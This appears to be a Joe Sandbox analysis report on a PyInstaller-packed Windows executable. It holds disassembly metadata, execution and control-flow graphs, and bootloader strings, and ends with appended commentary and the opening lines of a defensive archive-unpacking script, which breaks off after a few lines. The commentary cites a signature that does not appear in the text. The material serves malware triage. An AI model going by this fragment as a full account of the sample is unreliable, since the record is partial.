                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: ?
                                                                                                                                                                                                      • API String ID: 1286766494-1684325040
                                                                                                                                                                                                      • Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                      • Instruction ID: d01e687f5c737a1716513eb621d5cf813aec06a6f1a0f07a87aa6a2680b5a6bf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8412822A092C242FB24AB25A451BB9E650EB92FA4F944335EE7C07AD9DF3CD451C750
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5990B6
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9CE
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: GetLastError.KERNEL32(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9D8
                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7FF58CC15), ref: 00007FF7FF5990D4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                      • API String ID: 3580290477-2366978088
                                                                                                                                                                                                      • Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                      • Instruction ID: 116025176c9ba06b75a6b1c5997c503702ba13ee47ba7defce06554ddc0d27b7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E417132A0879285EB28BF2594800FDA7A4FB457D0BD54235E97E43BC5DE3CE48283E0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                                                                                                      • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                      • Instruction ID: 4350fd86aabc0073b0910ea94eab0ec3ec10ade74b9cb836cc04849bbc619faf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8441A472B19BC685DB609F25E4443E9A760FB88794F845231EE6D87B98EF3CD401C790
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: DriveType_invalid_parameter_noinfo
• String ID: :
• API String ID: 2595371189-336475711

Execution Graph

Execution Coverage: 3.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 648
Total number of Limit Nodes: 8
30300->30301 30302 7ff7ff5908c6 30300->30302 30305 7ff7ff5907dc 30301->30305 30312 7ff7ff59a884 37 API calls 2 library calls 30302->30312 30313 7ff7ff5954dc EnterCriticalSection 30305->30313 30307 7ff7ff5907f9 30308 7ff7ff59081c 74 API calls 30307->30308 30309 7ff7ff590802 30308->30309 30310 7ff7ff5954e8 _fread_nolock LeaveCriticalSection 30309->30310 30311 7ff7ff59080d 30310->30311 30311->30299 30312->30299 30314->29969 30319 7ff7ff594a4e 30315->30319 30316 7ff7ff594a73 30333 7ff7ff59a884 37 API calls 2 library calls 30316->30333 30318 7ff7ff594aaf 30334 7ff7ff592c80 49 API calls _invalid_parameter_noinfo 30318->30334 30319->30316 30319->30318 30321 7ff7ff594b46 30322 7ff7ff594b8c 30321->30322 30326 7ff7ff594bb0 30321->30326 30327 7ff7ff594b61 30321->30327 30330 7ff7ff594b58 30321->30330 30324 7ff7ff59a9b8 __free_lconv_mon 11 API calls 30322->30324 30323 7ff7ff58c5c0 _log10_special 8 API calls 30325 7ff7ff581cc8 30323->30325 30332 7ff7ff594a9d 30324->30332 30325->29730 30326->30322 30328 7ff7ff594bba 30326->30328 30335 7ff7ff59a9b8 30327->30335 30331 7ff7ff59a9b8 __free_lconv_mon 11 API calls 30328->30331 30330->30322 30330->30327 30331->30332 30332->30323 30333->30332 30334->30321 30336 7ff7ff59a9bd RtlFreeHeap 30335->30336 30340 7ff7ff59a9ec 30335->30340 30337 7ff7ff59a9d8 GetLastError 30336->30337 30336->30340 30338 7ff7ff59a9e5 __free_lconv_mon 30337->30338 30341 7ff7ff594f78 11 API calls memcpy_s 30338->30341 30340->30332 30341->30340 30343 7ff7ff595f38 30342->30343 30344 7ff7ff595f5e 30343->30344 30347 7ff7ff595f91 30343->30347 30373 7ff7ff594f78 11 API calls memcpy_s 30344->30373 30346 7ff7ff595f63 30374 7ff7ff59a950 37 API calls _invalid_parameter_noinfo 30346->30374 30349 7ff7ff595fa4 30347->30349 30350 7ff7ff595f97 30347->30350 30361 7ff7ff59ac98 30349->30361 30375 7ff7ff594f78 11 API calls memcpy_s 30350->30375 30352 7ff7ff584606 30352->29984 30355 7ff7ff595fc5 30368 7ff7ff59ff3c 30355->30368 30356 7ff7ff595fb8 30376 7ff7ff594f78 11 API calls memcpy_s 
30356->30376 30359 7ff7ff595fd8 30377 7ff7ff5954e8 LeaveCriticalSection 30359->30377 30378 7ff7ff5a0348 EnterCriticalSection 30361->30378 30363 7ff7ff59acaf 30364 7ff7ff59ad0c 19 API calls 30363->30364 30365 7ff7ff59acba 30364->30365 30366 7ff7ff5a03a8 _isindst LeaveCriticalSection 30365->30366 30367 7ff7ff595fae 30366->30367 30367->30355 30367->30356 30379 7ff7ff59fc38 30368->30379 30372 7ff7ff59ff96 30372->30359 30373->30346 30374->30352 30375->30352 30376->30352 30384 7ff7ff59fc73 __vcrt_InitializeCriticalSectionEx 30379->30384 30381 7ff7ff59ff11 30398 7ff7ff59a950 37 API calls _invalid_parameter_noinfo 30381->30398 30383 7ff7ff59fe43 30383->30372 30391 7ff7ff5a6dc4 30383->30391 30384->30384 30389 7ff7ff59fe3a 30384->30389 30394 7ff7ff597aac 51 API calls 3 library calls 30384->30394 30386 7ff7ff59fea5 30386->30389 30395 7ff7ff597aac 51 API calls 3 library calls 30386->30395 30388 7ff7ff59fec4 30388->30389 30396 7ff7ff597aac 51 API calls 3 library calls 30388->30396 30389->30383 30397 7ff7ff594f78 11 API calls memcpy_s 30389->30397 30399 7ff7ff5a63c4 30391->30399 30394->30386 30395->30388 30396->30389 30397->30381 30398->30383 30400 7ff7ff5a63f9 30399->30400 30401 7ff7ff5a63db 30399->30401 30400->30401 30403 7ff7ff5a6415 30400->30403 30453 7ff7ff594f78 11 API calls memcpy_s 30401->30453 30410 7ff7ff5a69d4 30403->30410 30404 7ff7ff5a63e0 30454 7ff7ff59a950 37 API calls _invalid_parameter_noinfo 30404->30454 30408 7ff7ff5a63ec 30408->30372 30456 7ff7ff5a6708 30410->30456 30413 7ff7ff5a6a61 30476 7ff7ff598590 30413->30476 30414 7ff7ff5a6a49 30488 7ff7ff594f58 11 API calls memcpy_s 30414->30488 30417 7ff7ff5a6a4e 30489 7ff7ff594f78 11 API calls memcpy_s 30417->30489 30425 7ff7ff5a6440 30425->30408 30455 7ff7ff598568 LeaveCriticalSection 30425->30455 30453->30404 30454->30408 30457 7ff7ff5a6734 30456->30457 30461 7ff7ff5a674e 30456->30461 30457->30461 30501 7ff7ff594f78 11 API calls memcpy_s 30457->30501 30459 7ff7ff5a6743 30502 7ff7ff59a950 37 API calls 
_invalid_parameter_noinfo 30459->30502 30462 7ff7ff5a67cc 30461->30462 30503 7ff7ff594f78 11 API calls memcpy_s 30461->30503 30463 7ff7ff5a681d 30462->30463 30505 7ff7ff594f78 11 API calls memcpy_s 30462->30505 30474 7ff7ff5a687a 30463->30474 30507 7ff7ff599be8 37 API calls 2 library calls 30463->30507 30466 7ff7ff5a6876 30469 7ff7ff5a68f8 30466->30469 30466->30474 30467 7ff7ff5a6812 30506 7ff7ff59a950 37 API calls _invalid_parameter_noinfo 30467->30506 30508 7ff7ff59a970 17 API calls _isindst 30469->30508 30471 7ff7ff5a67c1 30504 7ff7ff59a950 37 API calls _invalid_parameter_noinfo 30471->30504 30474->30413 30474->30414 30509 7ff7ff5a0348 EnterCriticalSection 30476->30509 30488->30417 30489->30425 30501->30459 30502->30461 30503->30471 30504->30462 30505->30467 30506->30463 30507->30466 30511 7ff7ff597968 30510->30511 30514 7ff7ff597444 30511->30514 30513 7ff7ff597981 30513->29994 30515 7ff7ff59745f 30514->30515 30516 7ff7ff59748e 30514->30516 30525 7ff7ff59a884 37 API calls 2 library calls 30515->30525 30524 7ff7ff5954dc EnterCriticalSection 30516->30524 30519 7ff7ff597493 30521 7ff7ff5974b0 38 API calls 30519->30521 30520 7ff7ff59747f 30520->30513 30522 7ff7ff59749f 30521->30522 30523 7ff7ff5954e8 _fread_nolock LeaveCriticalSection 30522->30523 30523->30520 30525->30520 30527 7ff7ff58fee1 30526->30527 30528 7ff7ff58feb3 30526->30528 30531 7ff7ff58fed3 30527->30531 30536 7ff7ff5954dc EnterCriticalSection 30527->30536 30537 7ff7ff59a884 37 API calls 2 library calls 30528->30537 30531->29998 30532 7ff7ff58fef8 30533 7ff7ff58ff14 72 API calls 30532->30533 30534 7ff7ff58ff04 30533->30534 30535 7ff7ff5954e8 _fread_nolock LeaveCriticalSection 30534->30535 30535->30531 30537->30531 30538->30015 30540 7ff7ff582fe0 30541 7ff7ff582ff0 30540->30541 30542 7ff7ff58302b 30541->30542 30543 7ff7ff583041 30541->30543 30568 7ff7ff582710 54 API calls _log10_special 30542->30568 30545 7ff7ff583061 30543->30545 30556 7ff7ff583077 __std_exception_copy 30543->30556 30569 7ff7ff582710 54 
API calls _log10_special 30545->30569 30547 7ff7ff58c5c0 _log10_special 8 API calls 30549 7ff7ff5831fa 30547->30549 30548 7ff7ff583037 __std_exception_copy 30548->30547 30550 7ff7ff581470 116 API calls 30550->30556 30551 7ff7ff583349 30576 7ff7ff582710 54 API calls _log10_special 30551->30576 30552 7ff7ff581c80 49 API calls 30552->30556 30554 7ff7ff583333 30575 7ff7ff582710 54 API calls _log10_special 30554->30575 30556->30548 30556->30550 30556->30551 30556->30552 30556->30554 30557 7ff7ff58330d 30556->30557 30559 7ff7ff583207 30556->30559 30574 7ff7ff582710 54 API calls _log10_special 30557->30574 30560 7ff7ff583273 30559->30560 30570 7ff7ff59a474 37 API calls 2 library calls 30559->30570 30562 7ff7ff58329e 30560->30562 30563 7ff7ff583290 30560->30563 30572 7ff7ff582dd0 37 API calls 30562->30572 30571 7ff7ff59a474 37 API calls 2 library calls 30563->30571 30566 7ff7ff58329c 30573 7ff7ff582500 54 API calls __std_exception_copy 30566->30573 30568->30548 30569->30548 30570->30560 30571->30566 30572->30566 30573->30548 30574->30548 30575->30548 30576->30548

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      control_flow_graph 0 7ff7ff581000-7ff7ff583806 call 7ff7ff58fe88 call 7ff7ff58fe90 call 7ff7ff58c8c0 call 7ff7ff595460 call 7ff7ff5954f4 call 7ff7ff5836b0 14 7ff7ff583808-7ff7ff58380f 0->14 15 7ff7ff583814-7ff7ff583836 call 7ff7ff581950 0->15 16 7ff7ff583c97-7ff7ff583cb2 call 7ff7ff58c5c0 14->16 20 7ff7ff58383c-7ff7ff583856 call 7ff7ff581c80 15->20 21 7ff7ff58391b-7ff7ff583931 call 7ff7ff5845b0 15->21 25 7ff7ff58385b-7ff7ff58389b call 7ff7ff588a20 20->25 27 7ff7ff58396a-7ff7ff58397f call 7ff7ff582710 21->27 28 7ff7ff583933-7ff7ff583960 call 7ff7ff587f80 21->28 35 7ff7ff58389d-7ff7ff5838a3 25->35 36 7ff7ff5838c1-7ff7ff5838cc call 7ff7ff594fa0 25->36 40 7ff7ff583c8f 27->40 38 7ff7ff583984-7ff7ff5839a6 call 7ff7ff581c80 28->38 39 7ff7ff583962-7ff7ff583965 call 7ff7ff5900bc 28->39 41 7ff7ff5838a5-7ff7ff5838ad 35->41 42 7ff7ff5838af-7ff7ff5838bd call 7ff7ff588b90 35->42 47 7ff7ff5839fc-7ff7ff583a2a call 7ff7ff588b30 call 7ff7ff588b90 * 3 36->47 48 7ff7ff5838d2-7ff7ff5838e1 call 7ff7ff588a20 36->48 53 7ff7ff5839b0-7ff7ff5839b9 38->53 39->27 40->16 41->42 42->36 76 7ff7ff583a2f-7ff7ff583a3e call 7ff7ff588a20 47->76 57 7ff7ff5838e7-7ff7ff5838ed 48->57 58 7ff7ff5839f4-7ff7ff5839f7 call 7ff7ff594fa0 48->58 53->53 56 7ff7ff5839bb-7ff7ff5839d8 call 7ff7ff581950 53->56 56->25 68 7ff7ff5839de-7ff7ff5839ef call 7ff7ff582710 56->68 62 7ff7ff5838f0-7ff7ff5838fc 57->62 58->47 65 7ff7ff5838fe-7ff7ff583903 62->65 66 7ff7ff583905-7ff7ff583908 62->66 65->62 65->66 66->58 70 7ff7ff58390e-7ff7ff583916 call 7ff7ff594fa0 66->70 68->40 70->76 79 7ff7ff583b45-7ff7ff583b53 76->79 80 7ff7ff583a44-7ff7ff583a47 76->80 82 7ff7ff583b59-7ff7ff583b5d 79->82 83 7ff7ff583a67 79->83 80->79 81 7ff7ff583a4d-7ff7ff583a50 80->81 84 7ff7ff583a56-7ff7ff583a5a 81->84 85 7ff7ff583b14-7ff7ff583b17 81->85 86 
7ff7ff583a6b-7ff7ff583a90 call 7ff7ff594fa0 82->86 83->86 84->85 87 7ff7ff583a60 84->87 88 7ff7ff583b19-7ff7ff583b1d 85->88 89 7ff7ff583b2f-7ff7ff583b40 call 7ff7ff582710 85->89 95 7ff7ff583aab-7ff7ff583ac0 86->95 96 7ff7ff583a92-7ff7ff583aa6 call 7ff7ff588b30 86->96 87->83 88->89 91 7ff7ff583b1f-7ff7ff583b2a 88->91 97 7ff7ff583c7f-7ff7ff583c87 89->97 91->86 99 7ff7ff583be8-7ff7ff583bfa call 7ff7ff588a20 95->99 100 7ff7ff583ac6-7ff7ff583aca 95->100 96->95 97->40 108 7ff7ff583c2e 99->108 109 7ff7ff583bfc-7ff7ff583c02 99->109 102 7ff7ff583bcd-7ff7ff583be2 call 7ff7ff581940 100->102 103 7ff7ff583ad0-7ff7ff583ae8 call 7ff7ff5952c0 100->103 102->99 102->100 114 7ff7ff583aea-7ff7ff583b02 call 7ff7ff5952c0 103->114 115 7ff7ff583b62-7ff7ff583b7a call 7ff7ff5952c0 103->115 111 7ff7ff583c31-7ff7ff583c40 call 7ff7ff594fa0 108->111 112 7ff7ff583c1e-7ff7ff583c2c 109->112 113 7ff7ff583c04-7ff7ff583c1c 109->113 123 7ff7ff583c46-7ff7ff583c4a 111->123 124 7ff7ff583d41-7ff7ff583d63 call 7ff7ff5844d0 111->124 112->111 113->111 114->102 122 7ff7ff583b08-7ff7ff583b0f 114->122 125 7ff7ff583b7c-7ff7ff583b80 115->125 126 7ff7ff583b87-7ff7ff583b9f call 7ff7ff5952c0 115->126 122->102 127 7ff7ff583cd4-7ff7ff583ce6 call 7ff7ff588a20 123->127 128 7ff7ff583c50-7ff7ff583c5f call 7ff7ff5890e0 123->128 139 7ff7ff583d65-7ff7ff583d6f call 7ff7ff584620 124->139 140 7ff7ff583d71-7ff7ff583d82 call 7ff7ff581c80 124->140 125->126 135 7ff7ff583bac-7ff7ff583bc4 call 7ff7ff5952c0 126->135 136 7ff7ff583ba1-7ff7ff583ba5 126->136 144 7ff7ff583ce8-7ff7ff583ceb 127->144 145 7ff7ff583d35-7ff7ff583d3c 127->145 142 7ff7ff583cb3-7ff7ff583cbd call 7ff7ff588850 128->142 143 7ff7ff583c61 128->143 135->102 155 7ff7ff583bc6 135->155 136->135 153 7ff7ff583d87-7ff7ff583d96 139->153 140->153 161 7ff7ff583cc8-7ff7ff583ccf 142->161 162 7ff7ff583cbf-7ff7ff583cc6 142->162 150 7ff7ff583c68 call 7ff7ff582710 143->150 144->145 151 7ff7ff583ced-7ff7ff583d10 call 7ff7ff581c80 144->151 145->150 163 7ff7ff583c6d-7ff7ff583c77 150->163 
168 7ff7ff583d2b-7ff7ff583d33 call 7ff7ff594fa0 151->168 169 7ff7ff583d12-7ff7ff583d26 call 7ff7ff582710 call 7ff7ff594fa0 151->169 158 7ff7ff583d98-7ff7ff583d9f 153->158 159 7ff7ff583dc4-7ff7ff583dda call 7ff7ff589400 153->159 155->102 158->159 165 7ff7ff583da1-7ff7ff583da5 158->165 171 7ff7ff583ddc 159->171 172 7ff7ff583de8-7ff7ff583e04 SetDllDirectoryW 159->172 161->153 162->150 163->97 165->159 166 7ff7ff583da7-7ff7ff583dbe SetDllDirectoryW LoadLibraryExW 165->166 166->159 168->153 169->163 171->172 175 7ff7ff583e0a-7ff7ff583e19 call 7ff7ff588a20 172->175 176 7ff7ff583f01-7ff7ff583f08 172->176 189 7ff7ff583e1b-7ff7ff583e21 175->189 190 7ff7ff583e32-7ff7ff583e3c call 7ff7ff594fa0 175->190 178 7ff7ff583f0e-7ff7ff583f15 176->178 179 7ff7ff583ffc-7ff7ff584004 176->179 178->179 183 7ff7ff583f1b-7ff7ff583f25 call 7ff7ff5833c0 178->183 184 7ff7ff584029-7ff7ff58403e call 7ff7ff5836a0 call 7ff7ff583360 call 7ff7ff583670 179->184 185 7ff7ff584006-7ff7ff584023 PostMessageW GetMessageW 179->185 183->163 196 7ff7ff583f2b-7ff7ff583f3f call 7ff7ff5890c0 183->196 211 7ff7ff584043-7ff7ff58405b call 7ff7ff586fb0 call 7ff7ff586d60 184->211 185->184 193 7ff7ff583e2d-7ff7ff583e2f 189->193 194 7ff7ff583e23-7ff7ff583e2b 189->194 199 7ff7ff583ef2-7ff7ff583efc call 7ff7ff588b30 190->199 200 7ff7ff583e42-7ff7ff583e48 190->200 193->190 194->193 209 7ff7ff583f64-7ff7ff583fa7 call 7ff7ff588b30 call 7ff7ff588bd0 call 7ff7ff586fb0 call 7ff7ff586d60 call 7ff7ff588ad0 196->209 210 7ff7ff583f41-7ff7ff583f5e PostMessageW GetMessageW 196->210 199->176 200->199 204 7ff7ff583e4e-7ff7ff583e54 200->204 207 7ff7ff583e56-7ff7ff583e58 204->207 208 7ff7ff583e5f-7ff7ff583e61 204->208 212 7ff7ff583e5a 207->212 213 7ff7ff583e67-7ff7ff583e83 call 7ff7ff586db0 call 7ff7ff587330 207->213 208->176 208->213 248 7ff7ff583fe9-7ff7ff583ff7 call 7ff7ff581900 209->248 249 7ff7ff583fa9-7ff7ff583fb3 call 7ff7ff589200 209->249 210->209 212->176 228 7ff7ff583e8e-7ff7ff583e95 213->228 229 7ff7ff583e85-7ff7ff583e8c 
213->229 232 7ff7ff583e97-7ff7ff583ea4 call 7ff7ff586df0 228->232 233 7ff7ff583eaf-7ff7ff583eb9 call 7ff7ff5871a0 228->233 231 7ff7ff583edb-7ff7ff583ef0 call 7ff7ff582a50 call 7ff7ff586fb0 call 7ff7ff586d60 229->231 231->176 232->233 246 7ff7ff583ea6-7ff7ff583ead 232->246 242 7ff7ff583ebb-7ff7ff583ec2 233->242 243 7ff7ff583ec4-7ff7ff583ed2 call 7ff7ff5874e0 233->243 242->231 243->176 256 7ff7ff583ed4 243->256 246->231 248->163 249->248 259 7ff7ff583fb5-7ff7ff583fca 249->259 256->231 260 7ff7ff583fcc-7ff7ff583fdf call 7ff7ff582710 call 7ff7ff581900 259->260 261 7ff7ff583fe4 call 7ff7ff582a50 259->261 260->163 261->248
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                      • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                      • API String ID: 2776309574-4232158417
                                                                                                                                                                                                      • Opcode ID: a750c602d76a7e2a475d34e9f9d3ae9ffbdd5ab13f145aa1f50bf47f8f7acdc7
                                                                                                                                                                                                      • Instruction ID: 57a01c2ceafa3121435a7f2d813a76db16d70b1190a458cf91c2cf10d2ca6edc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a750c602d76a7e2a475d34e9f9d3ae9ffbdd5ab13f145aa1f50bf47f8f7acdc7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90328D21A0D6C291FB29BB25D4542F9E691BF45780FC84232DA7E432D6EF2CE565C3E0
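The String ID list of this function is the PyInstaller onefile bootloader's own text: the `MEI` cookie magic, the `pyi-runtime-tmpdir` / `pyi-contents-directory` / `pyi-python-flag` runtime options, the `_PYI_ARCHIVE_FILE` and `_PYI_PARENT_PROCESS_LEVEL` environment variables, and the "Could not load PyInstaller's embedded PKG archive" error. That is what the "Found pyInstaller with non standard icon" signature above keys on, and the practical consequence for triage is that the payload is not in the PE's code at all: it is the Python script and PYZ archive packed after the bootloader, so unpacking that archive is the next step rather than disassembling `pyi_main`. The parser below is an added example, not part of the Joe Sandbox report and not PyInstaller's or pyinstxtractor's code. It implements the CArchive cookie and table-of-contents layout used by PyInstaller 2.1 and later (88-byte big-endian cookie at the end of the package, 18-byte TOC entry header followed by a NUL-terminated name, flag 1 meaning zlib), and the archive it reads is constructed inside the file, so no real sample, hash or offset from the report is involved. All function and variable names are the example's own.

```python
import struct
import zlib

# PyInstaller CArchive layout (PyInstaller 2.1 and later), as written by
# PyInstaller's archive writer and read by the pyinstxtractor tool.
PYI_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"     # cookie magic: "MEI" followed by 0c 0b 0a 0b 0e
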